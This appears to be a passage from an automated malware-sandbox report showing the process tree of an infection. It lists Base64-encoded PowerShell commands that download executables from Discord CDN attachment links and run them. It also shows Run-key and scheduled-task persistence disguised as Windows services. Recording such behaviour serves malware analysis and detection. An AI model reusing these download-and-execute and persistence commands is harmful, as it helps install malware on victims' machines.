C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAeABuACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADAANgA5ADQANAA2ADQANwAxADkAMwAvAGwAbABpAHAAZQBkAGUAZQBkAGQALgBlAHgAZQAnACwAIAA8ACMAYQB6AGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwByAHoAeAAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBmAGoAdwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAzAC4AZQB4AGUAJwApACkAPAAjAHkAcgBqACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAcwBmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBjAGoAcwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAzAC4AZQB4AGUAJwApADwAIwBqAHMAcwAjAD4A"8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\3.exe"C:\Users\Admin\AppData\Roaming\3.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"10⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\HHARrI0l8D.exe6⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\HHARrI0l8D.exeC:\Users\Admin\AppData\Local\Temp\HHARrI0l8D.exe7⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAbgBkACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADEANwAzADkANgA4ADQAOAA3ADUAMQAvAFMAZQBjAHUAcgBpAHQAeQAuAGUAeABlACcALAAgADwAIwBpAHIAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAeABmACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGMAdgBrACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADQALgBlAHgAZQAnACkAKQA8ACMAcQBmAGQAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYwBiAGoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGYAeQByACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADQALgBlAHgAZQAnACkAPAAjAGIAeABpACMAPgA="8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\4.exe"C:\Users\Admin\AppData\Roaming\4.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'10⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f10⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f11⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd10⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\Ds1LDOEyjt.exe6⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Ds1LDOEyjt.exeC:\Users\Admin\AppData\Local\Temp\Ds1LDOEyjt.exe7⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAcwBwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA0ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADMANAA2ADMANQA0ADQAMgAxADcANgAvAFcAaQBuAEYAbwByAG0ALgBlAHgAZQAnACwAIAA8ACMAeQB4AHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBrAHYAaQAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBhAHYAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA1AC4AZQB4AGUAJwApACkAPAAjAGIAbQBmACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHgAegBwACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwByAGkAeAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA1AC4AZQB4AGUAJwApADwAIwB6AHIAcwAjAD4A"8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\5.exe"C:\Users\Admin\AppData\Roaming\5.exe"9⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\5.exe"C:\Users\Admin\AppData\Roaming\5.exe"10⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\GjKI4UESBN.exe6⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\GjKI4UESBN.exeC:\Users\Admin\AppData\Local\Temp\GjKI4UESBN.exe7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\mNU33xPs28.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\mNU33xPs28.exeC:\Users\Admin\AppData\Local\Temp\mNU33xPs28.exe7⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\S48sKmJLIF.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\S48sKmJLIF.exeC:\Users\Admin\AppData\Local\Temp\S48sKmJLIF.exe7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAawBoACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA3ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADkANgA1ADEAOAAyADEAMQA2ADAANAAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAB0AFMAYwByAGUAZQBuAC4AZQB4AGUAJwAsACAAPAAjAG0AagBuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZgBlAGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAegBsAGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAOAAuAGUAeABlACcAKQApADwAIwBmAHMAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB1AGoAcwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZwBpAHYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAOAAuAGUAeABlACcAKQA8ACMAYgBpAHAAIwA+AA=="8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\8.exe"C:\Users\Admin\AppData\Roaming\8.exe"9⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 81610⤵
- Program crash
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\TBvbn5FGMT.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\TBvbn5FGMT.exeC:\Users\Admin\AppData\Local\Temp\TBvbn5FGMT.exe7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAYQB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADkANgA4ADUANwA5ADQANgAxADMAMgAvAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByAFMAbQBhAHIAdAB0AFMAYwByAGUAZQBuAC4AZQB4AGUAJwAsACAAPAAjAGUAawB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABjAGwAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwB1AGwAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAOQAuAGUAeABlACcAKQApADwAIwB2AHoAZQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB4AGsAZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAZAByAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAOQAuAGUAeABlACcAKQA8ACMAcQBnAGIAIwA+AA=="8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\9.exe"C:\Users\Admin\AppData\Roaming\9.exe"9⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\pI7A0t4Z9N.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\pI7A0t4Z9N.exeC:\Users\Admin\AppData\Local\Temp\pI7A0t4Z9N.exe7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAZQBiACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADAANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA2ADcANAA3ADkAMQA1ADMANgA4ADQANwA4ADcAMwA2ADEALwAxADAANgA3ADQANwA5ADQANgA5ADQANQA3ADEANQAwADAAMgA0AC8AbABjAG8AbQBwAGwAYwBtAHAAbwAuAGUAeABlACcALAAgADwAIwB5AGYAcwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAG0AawB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHMAYQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEAMQAuAGUAeABlACcAKQApADwAIwBqAHYAaAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGwAegAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAbAB2AGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAxAC4AZQB4AGUAJwApADwAIwB5AG4AdgAjAD4A"8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\11.exe"C:\Users\Admin\AppData\Roaming\11.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"10⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\xhE0ft0B5U.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\xhE0ft0B5U.exeC:\Users\Admin\AppData\Local\Temp\xhE0ft0B5U.exe7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAZABoACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADEANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA2ADcANAA3ADkAMQA1ADMANgA4ADQANwA4ADcAMwA2ADEALwAxADAANgA3ADQANwA5ADUAMAA3ADUANQA4ADIAMQA1ADYAOAAwAC8AcABsAGwAbQBtAGQAaQBpAHAAbQAuAGUAeABlACcALAAgADwAIwB3AHoAbgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAcAB1ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGEAYQB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnADEAMgAuAGUAeABlACcAKQApADwAIwBmAHQAbgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBlAGIAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdAB0AHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAyAC4AZQB4AGUAJwApADwAIwBtAHMAdAAjAD4A"8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\12.exe"C:\Users\Admin\AppData\Roaming\12.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"10⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\1kpScgE4PS.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\1kpScgE4PS.exeC:\Users\Admin\AppData\Local\Temp\1kpScgE4PS.exe7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAaABsACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQA0ADEAMwA5ADQANQA1ADMAMgA1ADAANgAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwAsACAAPAAjAHIAdwB2ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZABmAHMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBuAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAwAC4AZQB4AGUAJwApACkAPAAjAHQAZgBxACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHUAaQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGwAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxADAALgBlAHgAZQAnACkAPAAjAHAAawBqACMAPgA="8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\10.exe"C:\Users\Admin\AppData\Roaming\10.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'10⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f10⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f11⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd10⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\whwbnynKNT.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\whwbnynKNT.exeC:\Users\Admin\AppData\Local\Temp\whwbnynKNT.exe7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAZAB4ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADIANQA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAGQAbgAuAGQAaQBzAGMAbwByAGQAYQBwAHAALgBjAG8AbQAvAGEAdAB0AGEAYwBoAG0AZQBuAHQAcwAvADEAMAA2ADcANAA3ADkAMQA1ADMANgA4ADQANwA4ADcAMwA2ADEALwAxADAANgA3ADQANwA5ADUAMAA3ADkAMQAwADUAMwAzADEAMwAxAC8AQwBSAC4AZQB4AGUAJwAsACAAPAAjAGEAcQB4ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZwBmAHEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcwBkAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAzAC4AZQB4AGUAJwApACkAPAAjAGoAbQBiACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGUAcQBoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB0AGQAZgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxADMALgBlAHgAZQAnACkAPAAjAHoAegBsACMAPgA="8⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\13.exe"C:\Users\Admin\AppData\Roaming\13.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime' -Value '"C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe"' -PropertyType 'String'10⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f10⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f11⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd10⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAYwB5ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQAzADYANQAxADkAOQAzADMANQA1ADUANQAvAG0AcABkAGkAaQBpAGwAcABvAGUALgBlAHgAZQAnACwAIAA8ACMAYgBnAHAAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBxAHEAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAGQAagAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA2AC4AZQB4AGUAJwApACkAPAAjAG0AcgB4ACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGUAdgBoACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwB4AGYAbAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwA2AC4AZQB4AGUAJwApADwAIwBtAHIAYwAjAD4A"1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
